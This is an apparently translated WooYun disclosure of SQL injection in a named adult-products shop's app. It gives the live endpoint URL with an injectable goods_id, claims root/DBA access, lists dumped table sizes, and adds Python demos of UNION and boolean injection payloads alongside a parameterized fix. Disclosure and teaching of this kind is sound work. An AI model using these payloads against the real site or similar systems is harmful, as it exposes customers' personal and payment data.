SQL injection in an adult-products app exposes a large volume of e-commerce data (DBA privilege + root)

Posted by admin, 2017-03-27 23:48:28
Summary

2016-03-22: Actively contacting the vendor and waiting for them to claim the report; details withheld from the public
2016-05-06: Vendor has actively ignored the vulnerability; details disclosed to the public

Vulnerability summary (11 followers)

Defect ID: WooYun-2016-187555

Title: SQL injection in an adult-products app exposes a large volume of e-commerce data (DBA privilege + root)

Vendor: 火热网络商城

Author: DeadSea

Submitted: 2016-03-22 09:48

Published: 2016-05-06 09:48

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or actively ignored the report

Source: www.wooyun.org

Tags: none


Vulnerability details


Brief description:

Heard that adult products all go through the big vendors~~

Detailed description:

Code block:
http://shop.hot-3w.com/sweet/ai/goods.php?imsi=460008832642241&imei=866654024251636&lcd=1152%C3%971920&view_width=1152.0&view_height=1920.0&cid=174350851&lac=10034&mcc=460&mnc=0&pf=666070401&format=json&no=i0000217&versionCode=67&versionName=V2.6.7&goods_id=2472

The goods_id parameter is injectable. (The same request also carries the device's imsi and imei; the ecs_imsi_imei table in the listing below, with over 2.2 million rows, suggests the backend stores those identifiers as well.)
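The report states only that goods_id is injectable and then shows sqlmap-style output; the source of goods.php is not on the page. As an added example (not code from the report, the vendor, or ECShop), the following Python snippet reconstructs the pattern against an in-memory SQLite database: a numeric ID concatenated straight into the query, a UNION payload that pulls rows out of a second table, the boolean true/false probe that tools like sqlmap use to confirm the injection, and the parameterized fix. The real backend is MySQL (hence the root/DBA findings); SQLite is used here only so the example runs offline. Table names follow the ecs_ prefix from the listing; the rows, the "hash-placeholder" value and the function names are constructed for this example.

```python
import sqlite3


def build_db():
    """Constructed sample schema: two tables named after the report's listing, with made-up rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE ecs_goods (goods_id INTEGER PRIMARY KEY, goods_name TEXT, shop_price REAL);
        INSERT INTO ecs_goods VALUES (2472, 'sample item', 99.0), (2473, 'other item', 49.0);
        CREATE TABLE ecs_admin_user (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT);
        INSERT INTO ecs_admin_user VALUES (1, 'admin', 'hash-placeholder');
        """
    )
    return con


def goods_lookup_vulnerable(con, goods_id):
    """Hypothetical reconstruction of the bug: the query-string value is pasted into the SQL text."""
    sql = "SELECT goods_id, goods_name, shop_price FROM ecs_goods WHERE goods_id=" + goods_id
    return con.execute(sql).fetchall()


def goods_lookup_fixed(con, goods_id):
    """Hardened form: goods_id is numeric, so cast it first, then bind it as a parameter."""
    gid = int(goods_id)  # raises ValueError for anything that is not a plain integer
    return con.execute(
        "SELECT goods_id, goods_name, shop_price FROM ecs_goods WHERE goods_id=?", (gid,)
    ).fetchall()


def union_payload(base_id="2472"):
    """UNION-based extraction: same column count as the original SELECT, different table."""
    return base_id + " UNION SELECT user_id, user_name, password FROM ecs_admin_user"


def looks_injectable(lookup, con, base_id="2472"):
    """Boolean-based probe: if 'AND 1=1' leaves the result unchanged while 'AND 1=2' empties it,
    the value is being interpreted as SQL rather than as data."""
    try:
        baseline = lookup(con, base_id)
        true_case = lookup(con, base_id + " AND 1=1")
        false_case = lookup(con, base_id + " AND 1=2")
    except (ValueError, sqlite3.Error):
        return False  # a strict parser or a SQL error means the probe did not execute as SQL
    return true_case == baseline and false_case != baseline


def fixed_rejects(con, value):
    """True when the hardened lookup refuses the value outright."""
    try:
        goods_lookup_fixed(con, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id:", goods_lookup_vulnerable(db, "2472"))
    print("vulnerable, UNION:    ", goods_lookup_vulnerable(db, union_payload()))
    print("boolean probe (vuln): ", looks_injectable(goods_lookup_vulnerable, db))
    print("boolean probe (fixed):", looks_injectable(goods_lookup_fixed, db))
    print("fixed rejects UNION:  ", fixed_rejects(db, union_payload()))
```

In the PHP application itself the equivalent fix is intval() on goods_id plus a prepared statement (mysqli or PDO); casting alone closes this particular numeric injection, but binding the value protects every other parameter that reaches the same query builder.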

[Screenshot: root privilege]

[Screenshot: DBA]

[Screenshot: data]

[Screenshot: database table listing, reproduced as text below]

Code block (per-table row counts reported for database hs_shop):
Database: hs_shop
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| ecs_stats | 279166732 |
| ecs_stats_version | 179057603 |
| ecs_date_visit | 5909839 |
| ecs_pf_retention_rate_stats | 5532830 |
| ecs_imsi_imei | 2265449 |
| ecs_visit_imei | 2258961 |
| ecs_gold | 2135532 |
| ecs_consumer_photo_score | 1482439 |
| ecs_visit_imei_bak | 1167348 |
| ecs_community_private_letter | 659398 |
| ecs_community | 562980 |
| ecs_retention_rate_stats | 519615 |
| ecs_retention_rate_stats_bak | 185136 |
| ecs_consumer_check_log | 162840 |
| ecs_order_action | 151696 |
| ecs_consumer | 133147 |
| ecs_community_user | 132478 |
| ecs_community_gallery | 104496 |
| ecs_order_goods | 97106 |
| ecs_invoicing | 94700 |
| ecs_community_private_letter_status | 94486 |
| ecs_community_reply_delete_time | 79427 |
| ecs_consumer_photo_score_date | 79275 |
| ecs_click_category_stats | 67285 |
| ecs_order_stock_goods | 63084 |
| ecs_click_add | 59086 |
| ecs_order_info | 57622 |
| ecs_consumer_info | 53792 |
| ecs_delivery_goods | 53687 |
| ecs_onlinepay_log | 43242 |
| ecs_stats_hack_data | 38576 |
| ecs_consumer_fans | 32967 |
| ecs_rose | 32565 |
| ecs_code | 30257 |
| ecs_delivery_order | 26228 |
| ecs_order_analysis | 24081 |
| ecs_consumer_photo_score_week | 19644 |
| ecs_buyer_tel | 17272 |
| ecs_goods_article | 15785 |
| ecs_admin_log | 13539 |
| ecs_link_goods | 12915 |
| ecs_pay_log | 12687 |
| ecs_keywords | 12514 |
| ecs_wish_reply | 11179 |
| ecs_original_goods | 9764 |
| ecs_sessions_data | 9023 |
| ecs_client_status | 9009 |
| ecs_auto_manage | 8896 |
| ecs_back_goods | 6519 |
| ecs_goods_gallery | 6465 |
| ecs_save_ali | 6429 |
| ecs_article | 6423 |
| ecs_link_ads_goods | 5579 |
| ecs_consumer_photo | 5040 |
| ecs_sessions | 3816 |
| ecs_region | 3410 |
| ecs_back_order | 3325 |
| ecs_link_stockgoods | 2964 |
| ecs_message | 2916 |
| ecs_community_to_report | 2848 |
| ecs_stock | 2829 |
| ecs_goods | 2381 |
| ecs_temp_sales | 2196 |
| ecs_goods_cat | 2189 |
| ecs_wish | 2031 |
| ecs_goods_attr | 1928 |
| ecs_order_false_delete | 1900 |
| ecs_jrtj_log | 1394 |
| ecs_comment | 1038 |
| ecs_added_uv | 1019 |
| ecs_goods_test | 983 |
| ecs_searchengine | 894 |
| ecs_added_uv_bak | 645 |
| test_stock | 510 |
| invoicing_test | 307 |
| ecs_ads_goods | 217 |
| ecs_shop_config | 185 |
| ecs_admin_action | 146 |
| ecs_users | 107 |
| ecs_micro_currency_log | 100 |
| ecs_account_log | 62 |
| ecs_category | 58 |
| ecs_original_suppliers | 49 |
| ecs_area_region | 36 |
| ecs_shipping_area | 36 |
| ecs_shipping_fee | 36 |
| ecs_pf_info | 35 |
| ecs_nav | 32 |
| ecs_save_yeepay | 31 |
| ecs_admin_user | 24 |
| ecs_template | 22 |
| ecs_article_cat | 21 |
| ecs_cat_recommend | 17 |
| ecs_brand | 14 |
| ecs_mail_templates | 14 |
| ecs_apps_recommend | 10 |
| ecs_test | 10 |
| ecs_user_address | 10 |
| ecs_user_bonus | 10 |
| ecs_suppliers | 9 |
| ecs_order_product | 8 |
| ecs_bank | 7 |
| ecs_attribute | 6 |
| ecs_goods_type | 6 |
| ecs_package_goods | 6 |
| ecs_payment | 6 |
| ecs_reg_fields | 6 |
| ecs_user_account | 6 |
| ecs_volume_price | 5 |
| ecs_bonus_type | 4 |
| ecs_friend_link | 4 |
| ecs_user_rank | 3 |
| ecs_vote_option | 3 |
| ecs_website_app | 3 |
| synchronize_upside | 3 |
| user_status_report | 3 |
| ecs_exchange_goods | 2 |
| ecs_snatch_log | 2 |
| ecs_test02 | 2 |
| ecs_topic | 2 |
| ecs_ad | 1 |
| ecs_adsense | 1 |
| ecs_app_info | 1 |
| ecs_auction_log | 1 |
| ecs_crons | 1 |
| ecs_favourable_activity | 1 |
| ecs_goods_activity | 1 |
| ecs_push_info | 1 |
| ecs_shipping | 1 |
| ecs_version_updates | 1 |
| ecs_vote | 1 |
| ecs_wholesale | 1 |
+-------------------------------------+---------+
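The listing above is raw tool output; what matters for impact is which of those tables hold credentials, payment records, device identifiers or personal data, and how many rows each has. As an added example (not part of the report), the following Python snippet parses a "Table | Entries" listing in exactly the format shown above and ranks the tables by row count within a handful of name-based sensitivity categories. The embedded listing is a constructed excerpt of the one on the page, and the category keywords are an assumption based only on table names, since the schema itself is not on the page.

```python
import re
from collections import namedtuple

# Constructed excerpt of the "Table | Entries" listing shown in the report.
LISTING = """\
Database: hs_shop
+-------------------------------------+---------+
| Table | Entries |
+-------------------------------------+---------+
| ecs_stats | 279166732 |
| ecs_imsi_imei | 2265449 |
| ecs_community_private_letter | 659398 |
| ecs_consumer | 133147 |
| ecs_order_info | 57622 |
| ecs_onlinepay_log | 43242 |
| ecs_buyer_tel | 17272 |
| ecs_pay_log | 12687 |
| ecs_sessions | 3816 |
| ecs_region | 3410 |
| ecs_users | 107 |
| ecs_admin_user | 24 |
+-------------------------------------+---------+
"""

# Name-based heuristic (assumption: the schema is not on the page, so table names
# are the only signal). First matching category wins, so order matters.
CATEGORIES = [
    ("credentials", ("admin_user", "users", "sessions")),
    ("device identifiers", ("imsi", "imei")),
    ("payment", ("pay", "order_info")),
    ("personal data", ("consumer", "buyer_tel", "private_letter", "user_address")),
]

Row = namedtuple("Row", "db table entries category")


def classify(table):
    """Map a table name to a sensitivity category, or None if nothing matches."""
    for category, keywords in CATEGORIES:
        if any(k in table for k in keywords):
            return category
    return None


def parse_listing(text):
    """Parse the 'Database: X' header and every '| name | count |' data row."""
    db, rows = None, []
    for line in text.splitlines():
        m = re.match(r"Database:\s*(\S+)", line)
        if m:
            db = m.group(1)
            continue
        m = re.match(r"\|\s*(\S+)\s*\|\s*(\d+)\s*\|", line)  # header/border rows fail this
        if m:
            rows.append(Row(db, m.group(1), int(m.group(2)), classify(m.group(1))))
    return rows


def triage(text):
    """Sensitive tables only, largest first."""
    return sorted((r for r in parse_listing(text) if r.category), key=lambda r: -r.entries)


def category_totals(text):
    """Total row count per sensitivity category."""
    totals = {}
    for r in triage(text):
        totals[r.category] = totals.get(r.category, 0) + r.entries
    return totals


if __name__ == "__main__":
    for r in triage(LISTING):
        print(f"{r.db}.{r.table:<32} {r.entries:>10}  {r.category}")
    print(category_totals(LISTING))
```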

Proof of vulnerability:

(Same table listing as in the detailed description above.)

Remediation:

Copyright notice: when reposting, credit the source: DeadSea@WooYun


Vulnerability response

Vendor response:

Vendor could not be reached, or actively declined

Vulnerability Rank: 15 (WooYun assessment)




Comments

  1. 2016-03-22 09:57 | Zhe ( Regular white hat | Rank: 2126 | Vulns: 456 | "Power banks and wristbands have already circled the globe, can we get something else" )

    2

    Utterly ruthless

  2. 2016-03-22 15:21 | Xenon ( Regular white hat | Rank: 134 | Vulns: 42 | "Loving XXOO is just great" )

    1

    Utterly ruthless

  3. 2016-03-22 16:38 | k0_pwn ( Regular white hat | Rank: 202 | Vulns: 17 | "Focused and free" )

    1

    Master, 66666

  4. 2016-03-22 17:32 | DeadSea ( Regular white hat | Rank: 284 | Vulns: 63 | "Handsome, bright-eyed, tall and dashing, with a star..." )

    1

    _pwn

  5. 2016-03-22 17:52 | k0_pwn ( Regular white hat | Rank: 202 | Vulns: 17 | "Focused and free" )

    1

    @DeadSea haha, hello big bro!

  6. 2016-03-22 18:33 | 90Snake ( Regular white hat | Rank: 167 | Vulns: 53 | "If a person has no dreams, how are they different from a salted fish" )

    1

    Utterly ruthless

  7. 2016-03-22 23:32 | JGHOOluwa ( Regular white hat | Rank: 556 | Vulns: 88 | "Just here to watch the big shots go godlike ^-^" )

    1

    丧(gan)心(de)病(piao)狂(liang) ["utterly ruthless", punned as "nicely done"]

  8. 2016-03-25 15:56 | 立志成为厨神的男人 ( Passer-by | Rank: 15 | Vulns: 1 | "I'm hungry" )

    1

    Lines up with my own target quite well. Lost it.
